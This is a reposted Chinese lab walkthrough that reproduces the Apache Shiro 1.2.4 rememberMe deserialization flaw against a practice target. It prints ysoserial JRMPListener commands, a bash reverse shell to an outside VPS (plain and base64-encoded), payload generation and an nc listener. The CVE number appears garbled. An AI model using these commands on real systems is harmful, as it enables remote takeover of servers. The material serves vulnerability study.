失眠网,内容丰富有趣,生活中的好帮手!
失眠网 > 【漏洞复现】ApacheShiro1.2.4反序列化漏洞复现(CVE--4437)

【漏洞复现】ApacheShiro1.2.4反序列化漏洞复现(CVE--4437)

时间:2019-06-09 05:01:26

相关推荐

【漏洞复现】ApacheShiro1.2.4反序列化漏洞复现(CVE--4437)

前言:

Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。

影响版本:

Apache Shiro <= 1.2.4

漏洞原理:

Apache Shiro 1.2.4及以前版本中,Apache Shiro默认使用了CookieRememberMeManager,其处理cookie的流程是:得到rememberMe的cookie值 > Base64解码–>AES解密–>反序列化。然而AES的密钥是硬编码的,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞。

漏洞特征:

shiro反序列化的特征:在返回包的 Set-Cookie 中存在 rememberMe=deleteMe 字段

漏洞复现:

vps机器,java环境版本Apache Shiro <=1.2.4http请求包cookie中的RememberMe参数靶场地址:http://vulfocus.fofa.so/exp下载地址:/share/init?surl=yH6phKiN3F5RihRXSPe-Qg(提取码pstc)

第一步:启动靶机后,访问URL通过burp抓包,判断环境存在shiro,查看返回包中Set-Cookie中是否存在rememberMe=deleteMe

第二步:打开公网vps,执行如下命令:(注意这里监听的端口为1099)

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections4 "反弹 shell 的命令"

这里的命令需要使用Java Runtime配置bash编码。

在线编码转换地址:http://www.jackson-t.ca/runtime-exec-payloads.html

转换命令如下:(这里是反弹shell的端口为1234)

bash -i >& /dev/tcp/VPS公网ip/1234 0>&1

第三步:最终在VPS上执行的命令如下:

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections4 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMDYuMTMuOS4zNC8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}"

第四步:使用exp.py生成payload,需要python2的环境,命令如下:

python2 exp.py 公网VPS:1099 (注意这里的端口为1099)

红色框标出的为生成的payload

第五步:在VPS上,使用nc监听1234端口,命令如下:

nc -lvvp 1234

第六步:通过burp抓取任意的http数据包,在cookie中添加生成的payload

第七步:通过burp发送数据包,查看VPS中java监听接口,nc监听结果。

如果觉得《【漏洞复现】ApacheShiro1.2.4反序列化漏洞复现(CVE--4437)》对你有帮助,请点赞、收藏,并留下你的观点哦!

本内容不代表本网观点和政治立场,如有侵犯你的权益请联系我们处理。
网友评论
网友评论仅供其表达个人看法,并不表明网站立场。